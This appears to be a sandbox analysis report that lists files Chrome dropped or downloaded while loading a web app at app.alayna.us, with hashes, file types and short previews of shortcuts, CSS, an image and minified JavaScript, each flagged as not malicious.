                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Feb 25 20:19:57 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):2681
                                                                                        Entropy (8bit):4.0164383220603606
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:092597C3C9AC5A15AED2DE5EA409D50A
                                                                                        SHA1:010FFAECA8215806B228A2F27E72929C20CAA40C
                                                                                        SHA-256:7C76EC9AA2F1D543E1228BF683856EA96FE5725B225B45ED4B18DCA4DB87CE25
                                                                                        SHA-512:1B6EBAEA650982D008B009C691B55711854A6B739A48FEE7A2006E09724BF2EF3AFEBBA9B99E59AC4CBDAD8382B31D41C00D33DF633E2B6504F1E6C13394F781
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:L..................F.@.. ...$+.,......"........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IYZt.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VYZ|.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VYZ|.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VYZ|............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VYZ}............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Feb 25 20:19:57 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):2681
                                                                                        Entropy (8bit):4.00493144179934
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:21124CE7EAE529E08FE1B8262A43D219
                                                                                        SHA1:DE4AF29C22E1A1C8D17986DE4F58B44F1802FE05
                                                                                        SHA-256:89D94655C2A6193155301BBF91E536B9AC8809D8C659E50A64F90202C4F402EE
                                                                                        SHA-512:2AB24EB94757F78178DE8551976BC54F340DF6C5BD229221B839B56F47D31342ABE19BD17DAF94CD0D8FF154283C6BEE93ED4FDF5533B57D1C2E59857DBB6079
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:L..................F.@.. ...$+.,......0........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IYZt.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VYZ|.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VYZ|.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VYZ|............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VYZ}............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Feb 25 20:19:57 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):2683
                                                                                        Entropy (8bit):4.016432549373098
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:C11E6FCD125C4BF85B1FE97C7CC91224
                                                                                        SHA1:051CB8F1A9A0D4137D83EE3C4877463925DC0CF3
                                                                                        SHA-256:87662ECC2C887D72B882CEFB874C6C0C10A66F1E1C9876BEF4BEB8F778061EC8
                                                                                        SHA-512:6D40958B5F76F82B6C13692F2E98A7A65F91D574C7BA79F19DD1C4E17174854692EBCC19FAF8A35C1D915A731F961D09A5393B35BEDD7A4C8375BD42455AF674
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:L..................F.@.. ...$+.,...............y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IYZt.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VYZ|.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VYZ|.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VYZ|............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VYZ}............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):239064
                                                                                        Entropy (8bit):5.332726936709258
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:C1BCFEEC550A3DF6E8425CC198C77BC5
                                                                                        SHA1:40EE29649A12F1B0C3F32DAAA11B1904498C6A18
                                                                                        SHA-256:17109AABF6141EC73545FB5E767AFA4FB46FE4D1B4D4764A99B81D90900EF422
                                                                                        SHA-512:40F4284E0FA8D7C64634AE78286DCF8C818AFF4F92FEE9D282E7422425969F1439A3A7B219747C2DF11FE0E0D246662F5DCE5AD4AEC9D0F5C0A8E4C86610345D
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://app.alayna.us/client/assets/index.DAq5dCaE.css
                                                                                        Preview:@font-face{font-family:KaTeX_AMS;font-style:normal;font-weight:400;src:url(/client/assets/KaTeX_AMS-Regular.BQhdFMY1.woff2) format("woff2"),url(/client/assets/KaTeX_AMS-Regular.DMm9YOAa.woff) format("woff"),url(/client/assets/KaTeX_AMS-Regular.DRggAlZN.ttf) format("truetype")}@font-face{font-family:KaTeX_Caligraphic;font-style:normal;font-weight:700;src:url(/client/assets/KaTeX_Caligraphic-Bold.Dq_IR9rO.woff2) format("woff2"),url(/client/assets/KaTeX_Caligraphic-Bold.BEiXGLvX.woff) format("woff"),url(/client/assets/KaTeX_Caligraphic-Bold.ATXxdsX0.ttf) format("truetype")}@font-face{font-family:KaTeX_Caligraphic;font-style:normal;font-weight:400;src:url(/client/assets/KaTeX_Caligraphic-Regular.Di6jR-x-.woff2) format("woff2"),url(/client/assets/KaTeX_Caligraphic-Regular.CTRA-rTL.woff) format("woff"),url(/client/assets/KaTeX_Caligraphic-Regular.wX97UBjC.ttf) format("truetype")}@font-face{font-family:KaTeX_Fraktur;font-style:normal;font-weight:700;src:url(/client/assets/KaTeX_Fraktur-Bold.C
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 192x192, segment length 16, progressive, precision 8, 1280x528, components 3
                                                                                        Category:downloaded
                                                                                        Size (bytes):39873
                                                                                        Entropy (8bit):7.798724151164602
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:B42CB7CF436D55EBC689BE4280034F85
                                                                                        SHA1:B1AFC76798AEC41D0626E2E1B2BF7F9BC4D14AFB
                                                                                        SHA-256:9FDAD96D349C58616CE4341F578F880FAF56B10E968634AE61C6B0738D6C4FD7
                                                                                        SHA-512:661C6D98511221023AB025873B25EB7B7B6511800CE382DFC7FD02088211B6FE47C6D8BE6A9D2F953D04321364FAAEB691027FED47A368BA9BE4A6845CD413E0
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://res.cloudinary.com/almanac/image/upload/v1736504114/workspace_portal_uploads/Onedrive_Business_ogdmlp.jpg
                                                                                        Preview:......JFIF.............C....................................................................C............................................................................"....................................................................................................................................................................................................................................................................................................................................................................................................................................................................%.$2........................................................ ...v..kI...c.....S..gi&.....3..............................................................7..8y..4...t...W0"A.8.qa.]z..S...~n........$8..N...'7.9"Y...........#...'(.2....n2H......>vq.L.g..........................>.;T.75....Z.KG#....R.g..Ik.NP.>.~......{.....].Agb....dg .....u..L&...o..;.....9H..{x._..
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Java source, ASCII text, with very long lines (5319)
                                                                                        Category:downloaded
                                                                                        Size (bytes):5370
                                                                                        Entropy (8bit):5.32628781813935
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:221D6E69DBCF9EE47A23D6C91178EB42
                                                                                        SHA1:8137BF58D020300923ABD2FC8624E56C1AF713E5
                                                                                        SHA-256:4F8B995E7D40F76513D49B02E37709EFBB6EB156CECCF3007D8D0911CFC5DBF0
                                                                                        SHA-512:D0B97C265C1FE3211E678695393ACDD9EC6C96911D9AA12B5EA9E1D1DDF6338989575FEBFEAE2FBFA4476D53A0246B59384A3EC513BC5877B290CD4B48756A65
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://app.alayna.us/client/assets/ActivateUser.CFVvUFSP.js
                                                                                        Preview:import{o as A,u as S,r as d,a as k,b as C,c as R,j as e,B as m,S as I,d as o}from"./index.CmaSzYmM.js";import{A as _}from"./index.B_-yKeea.js";import{I as j}from"./index.CLF8hfvb.js";import"./ExclamationTriangleIcon.BNGKdN9E.js";const T="_appBackground_f9j6z_1",B="_formColors_f9j6z_5",U="_continueText_f9j6z_24",L="_continueBorder_f9j6z_29",n={appBackground:T,formColors:B,continueText:U,continueBorder:L};function z(){const{userId:t}=S(),[i,y]=d.useState(""),[p,v]=d.useState(""),{auth:u}=k(),x=C(),{addToast:l}=R(),{activateUserWithPassword:b,isCheckingActivationValidity:r,checkIfActivationValid:N,activatingUser:c,activatingUserError:g,activationValidityError:f}=u,P=async()=>{if(!t)return;if(i.length<12){l("Password must be at least 12 characters.",{type:"error"});return}if(i!==p){l("Passwords do not match.",{type:"error"});return}const{success:s}=await b(t,i);if(s){const h=new URLSearchParams(window.location.search).get("adminAppRedirect"),{token:w}=u;console.log("Token",w),console.log("
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:very short file (no magic)
                                                                                        Category:dropped
                                                                                        Size (bytes):1
                                                                                        Entropy (8bit):0.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:1
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 734475
                                                                                        Category:dropped
                                                                                        Size (bytes):175095
                                                                                        Entropy (8bit):7.997781120563898
                                                                                        Encrypted:true
                                                                                        SSDEEP:
                                                                                        MD5:66C1019FEA54E40283CF0F62EE2E9F57
                                                                                        SHA1:AA2FFF5D1588445C05065FB63FDCBA0266E96DD9
                                                                                        SHA-256:F87920384557C7BFD0FBF494CC751C0C8BB819DDF0C3EA935BC515C501ECEB49
                                                                                        SHA-512:596D8F84664148FCC82FD6C55999C9E9F11692C51060F57E8AE3B54D29378DDC30A553BEF73344DF51F5DDC54D5F22BC01AD6AF1FE085FBEC95A372924A0B0F8
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:...........iW.W.0.......Zj..<&.e..C.4..p..C..R..$.R*...s.<.3c..3.3.......8.3t..N.3.I....w.{......RI.$..u...).:.>........}I.....?($...I..(...^.... $]...I..7...."I^E...iG...=.....s.df...+W.....?.A.[b......<.,./... .%_..A.O.VU]*....`......,..>x..!GI..F.....e^N....'..6....d....J.......m....Yt+......b..%._. K.AV*."g)*..g%O.+X8.......m.h?..q.E.ss\.].....B.(...2^...v.J*.DE..t......X...J.+P...y.2.'..nE.F..e...%Y~ET*.4G.....@.=0.ErK^.}Y.=Ii.....h.......o...[..J..W......_.q..........:.r.N./..C.?...*...*./.9...\...T.J..R.'=..G...ps.....PvVvv!..ar...)VGU2.R.;mZ..X......<|.Yh.Z..z.UXu.@..C6[.%.......Z.K.......P../.B......-.\.Q V.?N.wP`...b.+\...";......ns.|.$!g(r.....-y...g2%_@..~.*T.y.]f.m..TW..b.3..O.i5..9S.`....Q...*.!.....9.p..."X..(..Xl......F.........Y.a..0=.I....Y.i......MD."...>..=..d.|..w..A.S.74.j(.....E.W.*e..ltu.....L.|P`^f.....B.#\9_b.......W[.6.. .............B...8....+o;a......;x..M......_.y.\....,.....T^..C....b...gI./.......
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (18113)
                                                                                        Category:dropped
                                                                                        Size (bytes):18159
                                                                                        Entropy (8bit):5.366056690310477
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:ADFE930BF3A6C7DE0B08648A688555B3
                                                                                        SHA1:8FF157A238E64A99C2ED9FE957F07C4B8D493BF2
                                                                                        SHA-256:98A5DDD054E17AB880F46C27CC2E759BCFC084A99D61E8CB4794C56CF88CA266
                                                                                        SHA-512:323AE86C8C355A6FC5BE75E931C004499B7F10A426CD34D10209C0F3FC59F8AF187F40F6A4F8A5B1BD558D0E0CEB3716D73428123A0E584F9F98D9F8C51AC340
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:import{r as t,a8 as be,aa as Je,ai as k,da as Qe,j as d,ac as et,ad as M,ae as R,bf as z,ag as tt,bI as Re,bs as ot,a9 as Te,ab as nt,be as ye,cM as rt,db as st,dc as lt,bH as at,dd as ct,de as it,aj as dt,bv as ut,df as pt,ak as ft,dg as Pe,ah as ht}from"./index.CmaSzYmM.js";var mt=[" ","Enter","ArrowUp","ArrowDown"],vt=[" ","Enter"],re="Select",[ce,ie,gt]=Qe(re),[ee,Ht]=Je(re,[gt,be]),de=be(),[St,Y]=ee(re),[xt,wt]=ee(re),Ee=n=>{const{__scopeSelect:c,children:e,open:a,defaultOpen:l,onOpenChange:p,value:r,defaultValue:s,onValueChange:o,dir:f,name:g,autoComplete:w,disabled:P,required:b,form:T}=n,i=de(c),[v,C]=t.useState(null),[u,m]=t.useState(null),[A,O]=t.useState(!1),te=ot(f),[E=!1,j]=Te({prop:a,defaultProp:l,onChange:p}),[K,X]=Te({prop:r,defaultProp:s,onChange:o}),V=t.useRef(null),H=v?T||!!v.closest("form"):!0,[U,B]=t.useState(new Set),F=Array.from(U).map(_=>_.props.value).join(";");return d.jsx(nt,{...i,children:d.jsxs(St,{required:b,scope:c,trigger:v,onTriggerChange:C,valueNode:u,o
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Java source, ASCII text, with very long lines (747)
                                                                                        Category:downloaded
                                                                                        Size (bytes):792
                                                                                        Entropy (8bit):5.2034468056472
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:9F68545991A7B9CC42FDA8518817A0FA
                                                                                        SHA1:2C48301DA415A56E397C55565C82C00DD44C7D58
                                                                                        SHA-256:D90F0881E77C035EA25B64BDD8B2A346DF2227DC989F9BAD84CDF6B35531E9DC
                                                                                        SHA-512:1C4DA58C20DFD9FDDC821DA6C406EE4B2E0DA02B46BFD94BA448F63BAA3DE73BB5653D2DDA8B6F7214F9CC4D053D6A595A6A2E635EA9B5D842717ED9C0FF5FF4
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://app.alayna.us/client/assets/Avatar.47vy-PoE.js
                                                                                        Preview:import{j as r}from"./index.CmaSzYmM.js";import{T as l}from"./index.D1TXq2aj.js";function a({userData:t,size:o,border:e}){const i=o/2,n=e?"border-2 border-current bg-current":"border-none";return t.avatarUrl?r.jsx(l,{content:t.name,showArrow:!0,side:"bottom",asChild:!1,children:r.jsx("img",{loading:"lazy",src:t.avatarUrl,alt:t.name,className:`rounded-full ${n}`,style:{border:e?"2px solid var(--slate7)":"none",width:o,height:o}})}):r.jsx(l,{content:t.name,showArrow:!0,side:"bottom",asChild:!1,children:r.jsx("div",{className:`flex items-center justify-center rounded-full text-white text-${i} font-semibold ${n} `,style:{backgroundColor:t.color,border:e?"2px solid var(--slate7)":"none",width:o,height:o},children:t.initial})})}export{a as A};.//# sourceMappingURL=Avatar.47vy-PoE.js.map.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (14572)
                                                                                        Category:downloaded
                                                                                        Size (bytes):14618
                                                                                        Entropy (8bit):5.084906151235207
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:B7E8BF5FE3A6113D703B05AA342051DE
                                                                                        SHA1:3BEC7A95B1563CF5689E3C9D22590385CA404799
                                                                                        SHA-256:3ED79429031B51A795D1D71418535378D33044A44DC8A293161E188F30CFED3F
                                                                                        SHA-512:F1488A2221257420CCB7844EE575418A32A5D99C89D44169307C2FA3F95383B1DA2B85C8775B38E55FEDBCB35CC08514C5E295C66A0A0D6738885684D939CC92
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://app.alayna.us/client/workbox-296e213d.js
                                                                                        Preview:define(["exports"],(function(t){"use strict";try{self["workbox:core:7.2.0"]&&_()}catch(t){}const e=(t,...e)=>{let s=t;return e.length>0&&(s+=` :: ${JSON.stringify(e)}`),s};class s extends Error{constructor(t,s){super(e(t,s)),this.name=t,this.details=s}}try{self["workbox:routing:7.2.0"]&&_()}catch(t){}const n=t=>t&&"object"==typeof t?t:{handle:t};class i{constructor(t,e,s="GET"){this.handler=n(e),this.match=t,this.method=s}setCatchHandler(t){this.catchHandler=n(t)}}class r extends i{constructor(t,e,s){super((({url:e})=>{const s=t.exec(e.href);if(s&&(e.origin===location.origin||0===s.index))return s.slice(1)}),e,s)}}class o{constructor(){this.t=new Map,this.i=new Map}get routes(){return this.t}addFetchListener(){self.addEventListener("fetch",(t=>{const{request:e}=t,s=this.handleRequest({request:e,event:t});s&&t.respondWith(s)}))}addCacheListener(){self.addEventListener("message",(t=>{if(t.data&&"CACHE_URLS"===t.data.type){const{payload:e}=t.data,s=Promise.all(e.urlsToCache.map((e=>{"stri
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (10612)
                                                                                        Category:downloaded
                                                                                        Size (bytes):15178
                                                                                        Entropy (8bit):5.262042896082664
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:E17DE762074F4C0486E6C8F83BBA07A2
                                                                                        SHA1:FA8A675C8C28B181ABB5171BCEF9E60A87E53A48
                                                                                        SHA-256:4F9121E988BD895F9B19A9C3032AC5FB831B519297FF6713C2CD9629FB211A28
                                                                                        SHA-512:DBFFE901FE2BEE0CF5AAB2681F0DA11B738160385673795700564DC7A22488BBF84851F5130239C8E593325888517E98C65C1B5371404E6B7EFB617C9383CCEF
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://app.alayna.us/client/assets/AITools.DdDAMa67.js
                                                                                        Preview:import{r as e,j as r}from"./index.CmaSzYmM.js";import{a,c as n,S as o,b as l}from"./list-view-rectangle.CqW52iAy.js";import{A as s}from"./types.ClYGS8-s.js";const c=t=>e.createElement("svg",{width:24,height:24,viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg",...t},e.createElement("path",{d:"M12.9819 11.8356L12.7365 11.1269H12.7365L12.9819 11.8356ZM8.25 9C8.25 9.41421 8.58579 9.75 9 9.75C9.41421 9.75 9.75 9.41421 9.75 9H8.25ZM11.25 14C11.25 14.4142 11.5858 14.75 12 14.75C12.4142 14.75 12.75 14.4142 12.75 14H11.25ZM6 2.75H18V1.25H6V2.75ZM21.25 6V18H22.75V6H21.25ZM18 21.25H6V22.75H18V21.25ZM2.75 18V6H1.25V18H2.75ZM6 21.25C4.20507 21.25 2.75 19.7949 2.75 18H1.25C1.25 20.6234 3.37665 22.75 6 22.75V21.25ZM21.25 18C21.25 19.7949 19.7949 21.25 18 21.25V22.75C20.6234 22.75 22.75 20.6234 22.75 18H21.25ZM18 2.75C19.7949 2.75 21.25 4.20507 21.25 6H22.75C22.75 3.37665 20.6234 1.25 18 1.25V2.75ZM6 1.25C3.37665 1.25 1.25 3.37665 1.25 6H2.75C2.75 4.20507 4.20507 2.75 6 2.75V1.25ZM14.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Java source, ASCII text, with very long lines (499)
                                                                                        Category:downloaded
                                                                                        Size (bytes):548
                                                                                        Entropy (8bit):5.117639700111687
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:475DDFF5080F1CBF0148268D4910BE2F
                                                                                        SHA1:0A5DFBD3415FB7286373660FBCDF527B631841F3
                                                                                        SHA-256:84904D251FCCAB927C4ACDEC4EF9A53ABE8597BC55C57EE201314F5ECB2E5ED3
                                                                                        SHA-512:85CEC1B445BA85686D1FA18C97E8A42568BA5A90D5AA4C91FF6C9554FD391255175C51BAD40CB678C80B2FE2ABA5ACA1BA566AF34806A1B1F99DA5942C5A245B
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://app.alayna.us/client/assets/Transition.1nOyKJ9c.js
                                                                                        Preview:import{r as t,j as m}from"./index.CmaSzYmM.js";function v(s,o,n=window,E={}){const e=t.useRef(),{capture:r,passive:c,once:u}=E;t.useEffect(()=>{e.current=o},[o]),t.useEffect(()=>{if(!(n&&n.addEventListener))return;const i=f=>{var a;return(a=e.current)==null?void 0:a.call(e,f)},p={capture:r,passive:c,once:u};return n.addEventListener(s,i,p),()=>n.removeEventListener(s,i,p)},[s,n,r,c,u])}const L=({children:s})=>m.jsx("span",{className:"animate-simpleTransition",children:s});export{L as T,v as u};.//# sourceMappingURL=Transition.1nOyKJ9c.js.map.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Java source, ASCII text, with very long lines (1030)
                                                                                        Category:dropped
                                                                                        Size (bytes):1074
                                                                                        Entropy (8bit):5.2758552150888764
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:B35581E4C0C512AFAFDA748B37853F01
                                                                                        SHA1:1351DEC234E017789FF2D3D2599A4545D2CB5EF8
                                                                                        SHA-256:100C5D9A81B24E9E7C7AD96FDCDF0A36DAF451D2C5D50E96C203D6A91DCE563B
                                                                                        SHA-512:ED786FB4431363387C8B0B45F81AC2B81251BBFF5BA4317DD5D30B47210F12CCF06010A996AD3FCCEAB6D3B1534169E2FAB8FF32FD6517BB3E41C95151F84A4E
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:import{d,j as e}from"./index.CmaSzYmM.js";const k="_label_1uvo1_1",C="_inputStyle_1uvo1_5",L="_textAreaStyle_1uvo1_26",l={label:k,inputStyle:C,textAreaStyle:L};function F(x){const{label:a,placeholder:m,type:c,value:u,onChange:r,onBlur:i,error:t,multiLine:s,name:p,id:o,className:y,disabled:b,required:h,autoComplete:_,autoFocus:S,maxLength:j,minLength:f,pattern:v,readOnly:g,onKeyDown:N}=x,n={value:u,onChange:A=>{r&&r(A.target.value)},onBlur:i,name:p,id:o,placeholder:m,className:d(s?l.textAreaStyle:l.inputStyle,"mt-2 rounded-md border px-4 py-2 text-sm",y,{"border-red-500 dark:border-red-500":t}),disabled:b,required:h,autoComplete:_,autoFocus:S,maxLength:j,minLength:f,pattern:v,readOnly:g};return e.jsxs("div",{className:"flex flex-col",children:[a&&e.jsx("label",{htmlFor:o,className:d(l.label,"block text-sm font-medium"),children:a}),s?e.jsx("textarea",{...n,rows:4,cols:50}):e.jsx("input",{type:c,...n,onKeyDown:N}),t&&e.jsx("span",{className:"mt-1 text-xs text-red-500 dark:text-red-500",c
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Java source, ASCII text, with very long lines (2296)
                                                                                        Category:downloaded
                                                                                        Size (bytes):2340
                                                                                        Entropy (8bit):5.2267253465801415
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:ABE868CCF3826427854F1E8203931076
                                                                                        SHA1:367C0DB87D8FCF62196A1F6004379B384BA0B3F9
                                                                                        SHA-256:23FDB8613759384FA6D60E4E8052857FC4189CBBC23623714EBF624ED28A87B3
                                                                                        SHA-512:95B814C8EDFA219977C5158AC7A5C9E9C337064D1D965CED3C338EFB1C580348F5ADE8371C43A3102C42C08F2B4CF608F5E8A259D5F7D1710CED86DECF5BA027
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://app.alayna.us/client/assets/index.KaME38Zl.js
                                                                                        Preview:import{r as s,j as e,B as b}from"./index.CmaSzYmM.js";import{I as j}from"./index.CLF8hfvb.js";function v(m){const[a,u]=s.useState(""),[l,d]=s.useState(!1),[n,o]=s.useState(!1),[i,h]=s.useState(!1),[r,c]=s.useState(!1),[x,f]=s.useState(!1);return s.useEffect(()=>{f(!a)},[a]),e.jsx("form",{onSubmit:async t=>{t.preventDefault(),c(!0);try{await m.onSubmitFeedback(a,l,n,i)}finally{c(!1)}},children:e.jsxs("div",{className:"flex flex-col space-y-4",children:[e.jsx(j,{placeholder:"What was the issue with the response? How could it be improved?",name:"comment",onChange:t=>{u(t)},value:a,multiLine:!0}),e.jsx("div",{children:e.jsxs("div",{className:"mt-2 flex items-start",children:[e.jsx("div",{className:"flex h-5 items-center",children:e.jsx("input",{id:"harmful/unsafe",name:"harmful/unsafe",checked:l,onChange:t=>d(t.target.checked),type:"checkbox",className:"h-4 w-4 rounded border-gray-300 text-blue-600 focus:ring-blue-500"})}),e.jsx("div",{className:"ml-2 text-sm",children:e.jsx("label",{htmlF
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                        Category:dropped
                                                                                        Size (bytes):89501
                                                                                        Entropy (8bit):5.289893677458563
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                        Malicious:false
                                                                                        Reputation:unknown
